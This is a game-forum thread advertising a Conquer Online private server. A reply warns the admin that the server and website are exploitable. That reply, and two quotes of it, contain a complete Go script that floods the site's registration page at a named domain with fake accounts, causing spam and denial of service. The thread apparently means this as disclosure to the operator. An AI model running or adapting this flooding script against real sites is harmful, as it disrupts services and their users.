|
You last visited: Today at 01:24
Advertisement
Comrades Conquer 5095 Version
Discussion on Comrades Conquer 5095 Version within the CO2 PServer Archive forum part of the CO2 PServer Advertising category.
06/14/2017, 11:22
|
#1
|
elite*gold: 0 
Join Date: Apr 2017
Posts: 5
Received Thanks: 1
|
Comrades Conquer 5095 Version
*LINK REMOVED*
Game Features:
5095 Classic Version
7/24 EU Host
Max 137 Level
+12 Compose System
VIP System is Working (Get Free VIP6)
Lottery System is Working(Garment,+8 Stone, +12 Stuff)
Drop 50 Cps Per Monster and Money Direct to your Items
Hourly PK Event (SS-FB, LASTMAN)
Daily PK Event (Top Conquer, FreedomWar, Guild Altar, BlackWar, PVP-War,Spouse PK, Elite PK, StayAlive, Lastman, Attackers, FirsKiller, Donation PK, GenderWar )
Weekly PK Event(Elite PK - 16 Players join this event and 8th,3rd,2nd,1st Winner take Reward)
DragonBall & Gems Map (Drop All Refined Gem)
Party Cps Drop 50- 60 - 70 - 80 - 100 - 110 CPs and Diamond/Gold/Silver Box Reward 5K,10K,1K Cps
Beginner Stuff Give Super 2 Soc 2 SRG -1 All Stuff
CPs Arena [2 Players Arena , 3 Players Arena, 4 Players Arena, 5 Players Arena]
If you want AFK and get CPs Use AFK Paddle in TC
All Weapons uplevel NPC in Market
Special Quest (Legend War, ExtraVaganza)
Non Ninja, Have a Tower/Fan
Old Jump
2 Guild War (Big GW (10M CPs Reward) & Philippines GW(5M CPs Reward))
Leveling Map (Labyrinth)
75 Special Garment in NPC
Gold Prize Quest
Titan/Ganoderma Drop LifeFruitBasket and Other Special Item
8 Big Boss (Terato, Banshee, PirateTurner, Chaos, Nemesis, Pirate, Ranger, Ocean Ghost)
Special PK Tournament/Event
All weapons have the same power. You can use Low-level weapon.
Vote System
Drop Events and MORE..
Server Start Date : 02/06/2017
Online Players : 25+
|
|
|
|
06/15/2017, 03:37
|
#2
|
elite*gold: 12
Join Date: Jul 2011
Posts: 8,212
Received Thanks: 4,114
|
TQ binary servers are very exploitable... exploits for logging into any account, nuking characters, etc. Your website is also running very exploitable versions of Apache and PHP from a decade ago. You should update that. Your registration page is easily spammed... and can cause a very easy denial of service. Here's the code to do that (below)... In general, this server is a security nightmare. Not that you'll listen, we told you this back in April.
Code:
package main
import (
"math/rand"
"net/http"
"net/url"
"strconv"
"sync/atomic"
)
var count int32
func main() {
println("X Gon' Give it to Ya")
for i := 0; i < 10; i++ { go x() }
x()
}
func x() {
for {
v := make(url.Values)
v.Add("txtAd", "X Gon' Give it to Ya")
v.Add("txtKullanici", "deadpool" + strconv.Itoa(rand.Int()))
v.Add("txtSifre", "test")
v.Add("txtMail", "test")
v.Add("txtCepTel", "test")
http.PostForm("http://www.comradesconquer.com/register.php", v)
c := atomic.AddInt32(&count, 1)
println(c)
}
}
|
|
|
|
|
06/15/2017, 04:34
|
#3
|
elite*gold: 0
Join Date: Nov 2016
Posts: 218
Received Thanks: 83
|
Quote:
Originally Posted by Spirited
TQ binary servers are very exploitable... exploits for logging into any account, nuking characters, etc. Your website is also running very exploitable versions of Apache and PHP from a decade ago. You should update that. Your registration page is easily spammed... and can cause a very easy denial of service. Here's the code to do that (below)... In general, this server is a security nightmare. Not that you'll listen, we told you this back in April.
Code:
package main
import (
"math/rand"
"net/http"
"net/url"
"strconv"
"sync/atomic"
)
var count int32
func main() {
println("X Gon' Give it to Ya")
for i := 0; i < 10; i++ { go x() }
x()
}
func x() {
for {
v := make(url.Values)
v.Add("txtAd", "X Gon' Give it to Ya")
v.Add("txtKullanici", "deadpool" + strconv.Itoa(rand.Int()))
v.Add("txtSifre", "test")
v.Add("txtMail", "test")
v.Add("txtCepTel", "test")
http.PostForm("http://www.comradesconquer.com/register.php", v)
c := atomic.AddInt32(&count, 1)
println(c)
}
}
|
Sorry for hijacking this thread but if you don't mind finding exploits on our server aswell "epoch" and notifying of such exploits would greatly appreciate it (tried pming me you but it seem you have disabled it. Thank you ahead of time.
|
|
|
|
|
06/15/2017, 04:49
|
#4
|
elite*gold: 12
Join Date: Jul 2011
Posts: 8,212
Received Thanks: 4,114
|
Quote:
Originally Posted by EpochCommunity
Sorry for hijacking this thread but if you don't mind finding exploits on our server aswell "epoch" and notifying of such exploits would greatly appreciate it (tried pming me you but it seem you have disabled it. Thank you ahead of time.
|
Sure thing. I'll see what I can do.
|
|
|
|
|
06/16/2017, 03:18
|
#5
|
elite*gold: 0
Join Date: Apr 2017
Posts: 5
Received Thanks: 1
|
Quote:
Originally Posted by Spirited
TQ binary servers are very exploitable... exploits for logging into any account, nuking characters, etc. Your website is also running very exploitable versions of Apache and PHP from a decade ago. You should update that. Your registration page is easily spammed... and can cause a very easy denial of service. Here's the code to do that (below)... In general, this server is a security nightmare. Not that you'll listen, we told you this back in April.
Code:
package main
import (
"math/rand"
"net/http"
"net/url"
"strconv"
"sync/atomic"
)
var count int32
func main() {
println("X Gon' Give it to Ya")
for i := 0; i < 10; i++ { go x() }
x()
}
func x() {
for {
v := make(url.Values)
v.Add("txtAd", "X Gon' Give it to Ya")
v.Add("txtKullanici", "deadpool" + strconv.Itoa(rand.Int()))
v.Add("txtSifre", "test")
v.Add("txtMail", "test")
v.Add("txtCepTel", "test")
http.PostForm("http://www.comradesconquer.com/register.php", v)
c := atomic.AddInt32(&count, 1)
println(c)
}
}
|
What can I do about it?
|
|
|
|
|
06/16/2017, 03:44
|
#6
|
elite*gold: 12
Join Date: Jul 2011
Posts: 8,212
Received Thanks: 4,114
|
Quote:
Originally Posted by outofwhack
What can I do about it?
|
For the most part, the effort would be more than the gain. The website is easy to fix. TQ binary servers, however, have been dead for years... the only ones still running are the ones that changed the assembly of the servers or programmed proxies for them. Both require a very high level knowledge of the problems and assembly. I'd close the server. It's not worth restarting either if you're going to look out of community for bad sources. Go support a server that you like. Donate and help make it better. There are plenty... server administration is no easy task.
|
|
|
|
|
06/28/2017, 22:37
|
#7
|
elite*gold: 0
Join Date: Apr 2017
Posts: 5
Received Thanks: 1
|
Quote:
Originally Posted by Spirited
For the most part, the effort would be more than the gain. The website is easy to fix. TQ binary servers, however, have been dead for years... the only ones still running are the ones that changed the assembly of the servers or programmed proxies for them. Both require a very high level knowledge of the problems and assembly. I'd close the server. It's not worth restarting either if you're going to look out of community for bad sources. Go support a server that you like. Donate and help make it better. There are plenty... server administration is no easy task.
|
thank you for the information
|
|
|
|
|
07/10/2017, 13:40
|
#8
|
elite*gold: 1
Join Date: Aug 2014
Posts: 30,474
Received Thanks: 3,205
|
CO2 PServer Advertising -> CO2 PServer Archi…
#moved
|
|
|
|
Similar Threads
|
Hello Fellow Comrades!!
08/29/2009 - Say Hello - 1 Replies
hello im new in this forum....
hope we can be friends..
LOL...:D
|
All times are GMT +2. The time now is 01:24.
|
|
